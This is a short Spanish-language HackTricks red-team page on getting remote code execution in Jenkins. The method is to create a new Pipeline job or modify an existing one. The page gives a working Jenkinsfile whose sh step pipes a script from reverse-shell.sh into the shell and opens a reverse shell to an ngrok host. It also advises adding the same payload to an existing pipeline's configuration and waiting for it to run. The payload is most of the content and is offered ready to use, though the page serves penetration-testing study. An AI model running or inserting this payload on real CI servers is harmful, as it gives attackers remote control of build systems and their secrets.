Jenkins RCE Creating/Modifying Pipeline

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Creando un nuevo Pipeline

En "Nuevo Elemento" (accesible en /view/all/newJob) selecciona Pipeline:

En la sección Pipeline escribe el reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Modificando un Pipeline

Si puedes acceder al archivo de configuración de algún pipeline configurado, simplemente modifícalo agregando tu reverse shell y luego ejecútalo o espera a que se ejecute.

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización